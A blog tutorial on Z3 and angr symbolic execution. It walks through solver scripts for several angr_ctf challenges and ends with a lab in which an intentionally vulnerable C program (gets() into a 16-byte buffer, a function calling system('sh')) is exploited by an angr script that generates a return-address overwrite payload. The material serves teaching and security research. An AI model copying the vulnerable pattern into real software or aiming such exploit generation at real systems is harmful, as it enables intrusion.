Play with Angr

14 minute read

Published: February 23, 2022

I have put this note in my draft for a long time :stuck_out_tongue_winking_eye: Recently, got a chance again to play with it in research. Here is the story about playing Angr just like a baby.

Constraint solving with Z3

Before we look into Angr, we should be faimiliar with Z3 first.

x = int(argv[1])
y = iny(argv[2])

z = x + y
if(x >= 5)
    y = y + z
    if(y < x)
        foobar(x, y, z)
    else
        ...

The screenshot above is the online interaction platform for Z3 solver. If we want to prove the reachability of foobar(), the general steps can be listed as:

declare variables with declare-const
I specify the type of variables as integer here. Imagine that you want to declare a variable of 32 bit address which has fixed width, Z3 can also provide us with bitvector types.
SSA (Static Single Assignment)
For y = y + z, we will assign another version y2 in our declaration. The reason is that conflicts would happen if there are different constraints imposed on before-y and after-y. The best way is just to imagine them as two different variables.
adding constraints
Start with assert, put operator at the head and operands at the tail.
Check satisfiability then get the model
check-sat can return whether constraints are satisfiable. If it returns sat, then we can try to the model, which is one possible solution of concrete assignment value to all constants.

How to prove validity

The steps above explain the basic use of Z3 solver to get one possible solution. We can also use it to prove validity of a formula! Take the above for example, we know that there exists a solution to satisfy all constraints; however, we might also want to prove the given constraint would be true no matter the concrete value of input we give, this is the validity of formula. We can make use of unreachability to achieve this.

(assert (formula))
(check-sat)
; -> sat
(reset)
(assert (not (formula)))
(check-sat)
; -> unsat

For the example above, we know that there exist possible solutions for formula. We reset Z3’s stack for constraints. Negate the formula, if there is no any solution can make negation of formula true, it means arbitrary solutions can make formula true, then it is valid! Otherwise, if you can find the solution, the solution can be considered as counterexample.

Simplify constraints

We all know that complex constraints would cause to a burden on solver. Z3 has a functionality to simplify the constraints in some case.

Modeling constraints with Bitvectors

As a binary guy, I am more interested in symbolic execution on bit type data structure, bitvectors.

; y = x + 0x10
(declare const x (_ BitVec 32))
(declare const y (_ BitVec 32))
(assert (= y (bvadd x #x10)))

Here, I declare both x and y as bitvectors with 32 bit width. bvadd is the add operation between bitvectors. We can also specify with signed(e.g., bvsadd) or unsigned(e.g., bvuadd).

Symbolic execution with Angr

Given the output of the sequence of operations, what must the input have been?

The data structure which supports symbolic execution in Angr is BitVector.
BitVector is a structure of AST which can be translated into symbolic constraints for Z3 engine.
e.g., When if(x > 4) is reached, we can get constraints such as <Bool x_32_1 > 4>.
Next question for the example above, which branch does Angr take? True or False branch?
Angr takes both branches and generates two successor states
True branch: state.solver.add(x > 4)
False branch: state.solver.add(!(x > 4))
Constraint solving to get the input.

Here, I am interested the form of symbolic constraints with Angr. I compile a sample code which will receive user’s input to a binary,

...
cond = input[0];
if(cond == 'a') {
    printf("Congrats\n");
}else {
    printf("Fail\n");
}

Use sample script to list out the constraints.

import angr

p = angr.Project("./simple", auto_load_libs=False)
state = p.factory.entry_state()
simgr = p.factory.simgr(state)
while True:
    print(len(state.solver.constraints))
    succ = state.step()
    if len(succ.successors) == 2:
        break
    state = succ.successors[0]

state1, state2 = succ.successors

print("For state 1")
print(state1.solver.constraints)

print("For state 2")
print(state2.solver.constraints)

Briefly introduce the script:

import the binary
define the entry state
simulation manager would help to manage the state

In while loop, I will break out when there are two successors, which are branches of if and else. Using solver.constraints can help me print out the constraints for the state.

For state 1
[<Bool packet_0_stdin_3_8 == 97>]
For state 2
[<Book packet_0_stdin_3_8 != 97>]

Angr doesn’t really run up the binary, but just simulate the state.

Recommend to read through Solver Engine

Learn with Angr ctf

The challenges are from jakespringer/angr_ctf. The angr is installed and run in my Ubuntu 18 virtual machine.
The general steps can be listed as:

Create project from the given binary
```
p = angr.Project([binary], auto_load_libs = False)
```
CLE module of Angr would load the binary. p represents entity of loaded binary.
Set state
```
ini = p.factory.entry_state()
```
Angr doesn’t work on binary directly, but make operations on simulation program state(SimState). It is just like a snapshot, many information are stored in attributes of state. entry_state tells symbex engine to start from entry point.
Create BVS(bitvector symbolic) or BVV(bitvector value)
symbolize memory or some interesting places
Set up Simulation Managers
```
sim = p.factory.simgr(ini)
```
It is just like the user interface for operations on state.
Run
```
sim.explore(find = target_address)
```
One famous use is with find. The value of find can be the target address(or list of) we want to run to, or a state (if matched in active stash, it would be stored in found stash). More examples can be found in exploration.
Constraint solving
```
// check whether state matches or not?
if simulation.found:
 sol_state = sim.found[0]
 sol = sol_state.posix.dumps(sys.stdin.fileno)
```
We can dump the corresponding solution for the state. sys.stdin.fileno will return the file descriptor for standard input which is 0. Please be careful the output format of dumps() function is byte sequence rather than string.

03 Angr symbolic registers

In this challenge, I learn how to symbolize registers. After I put 03_angr_symbolic_registers into ida pro,

I can find that get_user_input receives user input with hex format, and put values into eax, ebx, and edx.

import angr
import sys
import claripy

def exp():
    path = '../bin/03_angr_symbolic_registers'
    p = angr.Project(path, auto_load_libs = False)
    start = 0x80488D2
    # blank_state: leave data uninitialized
    ini_state = p.factory.blank_state(addr=start)

    input0 = claripy.BVS('x', 32)
    input1 = claripy.BVS('y', 32)
    input2 = claripy.BVS('z', 32)
    
    # to symbolize the registers
    ini_state.regs.eax = input0
    ini_state.regs.ebx = input1
    ini_state.regs.edx = input2

    def success(state):
        if b'Good Job.\n' in state.posix.dumps(1):
            return True
        else:
            return False

    def abort(state):
        if b'Try again.\n' in state.posix.dumps(1):
            return True
        else:
            return False

    sim = p.factory.simgr(ini_state)
    sim.explore(find=success, avoid=abort)

    if sim.found:
        # state has been stored in found
        for i in sim.found:
            sol_state = i
            sol0 = format(sol_state.solver.eval(input0), 'd')
            sol1 = format(sol_state.solver.eval(input1), 'd')
            sol2 = format(sol_state.solver.eval(input2), 'd')
            solution = sol0 + " " + sol1 + " " + sol2
            print("[+] Solution is: {}".format(solution))
    else:
        print("No solutions can be found!")


if __name__ == '__main__':
    exp()

This is my exploit. The most interesting parts are

blank state
Here, we use different state from entry_state(). You can follow the link to find more states. I specify the starting address to the place after get_user_input(). Using blank_state here would keep everything symbolic and unconstrained including registers and memory.
symbolize registers
explore

After running exploit and get results

04 Angr symbolic stack

In last challenge, we know how to symbolize registers. In this challenge, we will know how to symbolize variable stored on the stack (local variable).

From the screenshot, we can find that [ebp+var_C] and [ebp+var_10] are passed to complex_function0 and complex_function1 as parameters.

... same import ...

def exp():
    p = angr.Project('../bin/04_angr_symbolic_stack', auto_load_libs=False)
    start = 0x80486B2
    ini_state = p.factory.blank_state(addr=start)
    
    # create a new stack frame
    ini_state.regs.ebp = ini_state.regs.esp

    input0 = claripy.BVS('input0', 32)
    input1 = claripy.BVS('input1', 32)

    # To push two BVSs onto the stack
    # we need 8 bytes of space
    ini_state.regs.esp -= 8

    ini_state.stack_push(input0)
    ini_state.stack_push(input1)

    sim = p.factory.simgr(ini_state)

    def success(state):
        if b'Good Job.\n' in state.posix.dumps(1):
            return True
        else:
            return False

    def abort(state):
        if b'Try again.\n' in state.posix.dumps(1):
            return True
        else:
            return False

    sim.explore(find=success, avoid=abort)

    if sim.found:
        ... same ...

Here I felt a little confused. Why do I put esp’s value into ebp after I create a blank state? What does stack_push mean in the program?

First, after we create the blank state, I plan to create a new stack frame. This is the reason why I move current esp’s value into ebp, I start the new stack frame from current esp. The blank state starts at 0x80486B2 after scanf(); however, we need to replicate two actions at 0x80486A0 and 0x80486A4 to push our symbolic variables. This is how our stack_push works for.

05 Angr symbolic memory

In this challenge, we will symbolize memory at the specified address.

In the screenshot above, our input are read into four consecutive addresses strarting from user_input. Each input would take for 8 bytes which can be found in the offsets between them.

... same import ...

def exp():
    p = angr.Project('../bin/05_angr_symbolic_memory', auto_load_libs=False)
    start = 0x8048619
    ini_state = p.factory.blank_state(addr=start)

    user_input = 0x9F318E0

    input0 = claripy.BVS('input0', 64)
    input1 = claripy.BVS('input1', 64)
    input2 = claripy.BVS('input2', 64)
    input3 = claripy.BVS('input4', 64)

    ini_state.memory.store(user_input, input0)
    ini_state.memory.store(user_input + 0x8, input1)
    ini_state.memory.store(user_input + 0x10, input2)
    ini_state.memory.store(user_input + 0x18, input3)

    sim = p.factory.simgr(ini_state)

    ... define success and abort function ...

    sim.explore(find=success, avoid=abort)

    if sim.found:
        for i in sim.found:
            sol_state = i
            sol0 = sol_state.solver.eval(input0, cast_to=bytes)
            sol1 = sol_state.solver.eval(input1, cast_to=bytes)
            sol2 = sol_state.solver.eval(input2, cast_to=bytes)
            sol3 = sol_state.solver.eval(input3, cast_to=bytes)
            sol = sol0 + b" " + sol1 + b" " + sol2 + b" " + sol3
            print("[+] Success! solution is: {}".format(sol.decode("utf-8")))
    else:
        raise Exception('Could not find any answer')

if __name__ == '__main__':
    exp()

In my exploit, I still define the start address to the place after scanf. Next task is to make symbolization. This time, user_input is not stored in register or local variable,

but stored in .bss section as global variable. In Angr, we can directly read memory with .load(addr, size) or write to memory with .store(addr, data). To symbolize our global variable, we store our bitvectors into the global variables. Now, we are ready to solve the challenge.

06 Angr symbolic dynamic memory

There are several steps in this challenge.

The program allocates two 9 bytes buffers with malloc(), and the addresses which point to heaps would be put into buffer0 and buffer1 respectively. At the end of this basic block, the program will read the saved address from the buffers into edx and eax. Two registers would be used as the addresses which receive user’s input.
At first, I am confused that how to get the address of heaps (it should be eax value return from malloc()). However, we don’t need the true address of heaps. Following is my exploit,

import angr
import sys
import claripy

def exp():
    p = angr.Project('../bin/06_angr_symbolic_dynamic_memory', auto_load_libs=False)
    start = 0x80486B3
    ini_state = p.factory.blank_state(addr=start)

    buffer0 = 0xB2500B4
    buffer1 = 0xB2500BC

    fake_heap0 = 0xB250008
    fake_heap1 = 0xB250018

    input0 = claripy.BVS('input0', 64)
    input1 = claripy.BVS('input1', 64)

    ini_state.memory.store(buffer0, fake_heap0, endness=p.arch.memory_endness)
    ini_state.memory.store(buffer1, fake_heap1, endness=p.arch.memory_endness)

    ini_state.memory.store(fake_heap0, input0)
    ini_state.memory.store(fake_heap1, input1)

    sim = p.factory.simgr(ini_state)

... same constraint solving ...

I put two fake addresses into buffer respectively. To symbolize heaps, I put two bitvectors into heaps. We don’t need to care about the choice of fake addresses because Angr wouldn’t truly allocate the memory, it just makes simulation. Then we get the solutions.

08 Angr constraints

The workflow of this challenge is similar to the previous challenges, take a look at the following picture
there is a while loop which would iterate index on our input from 0 to 15. Each character of our input would be encrypted by complex_function, then go into the check of check_equals_IDontCareWhatItIs. Following is the content of this check function,

arg2 is 0x10 which means that this while loop would check each characters and leads to 2^16 possible branches. This is the place where path explosion happens!
To solve this problem, we can try to simply the constraint (avoid getting into so many if conditions). If we read into the code, we can find that check function tries to compare our encrypted input with some strings stored in the data section, take a look at the following picture

The address of the check function is 0x8048580

Take away, path explosion can be caused by if conditions in while loop. One solution to solve path explosion is to add constraints, in other words, simplify constraints.

Automatic exploit Buffer Overflow

#include<stdio.h>
#include<stdlib.h>

void try_to_call_me(){  system("sh"); }

int main(){
    setvbuf(stdout,0,2,0);
    setvbuf(stdin,0,2,0);
    setvbuf(stderr,0,2,0);

    puts( "Try exploit buffer overflow" );

    char buf[0x10];
    gets( buf );

    return 0;
}

It is easy to find vulnerability of buffer overflow in this program. We can overwrite return address of main() with try_to_call_me().

import angr

from angr import sim_options as so

def fully_symbolic(state, variable):
    for i in range(state.arch.bits):
        if not state.solver.symbolic(variable[i]):
            return False
    return True

def main():
    p = angr.Project("./bof", auto_load_libs=False)
    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY, so.MEMORY_SYMBOLIC_BYTES_MAP}
    es = p.factory.entry_state(add_options=extras)
    sm = p.factory.simulation_manager(es, save_unconstrained=True)

    call_me = 0x400692

    #print("Try to find vulnerability in bof\n")
    exploitable_state = None
    while exploitable_state is None:
        #print(sm)
        sm.step()
        if len(sm.unconstrained) > 0:
            #print("find {} unconstrained state, let's track exploitability".format(len(sm.unconstrained)))
            for u in sm.unconstrained:
                if fully_symbolic(u, u.regs.pc):
                    exploitable_state = u
                    break
            sm.drop(stash="unconstrained")

    ep = exploitable_state
    ep.add_constraints(ep.regs.pc == call_me)

    with open("./exploit", "wb") as f:
        f.write(ep.posix.dumps(0))
    
    #print("Put exploit into file")

if __name__ == '__main__':
    main()

This exploit can be separated to two steps:

Find exploitable state
add constraints and constraint solving

References

angr Documentation

Share on

Twitter Facebook LinkedIn

Rafael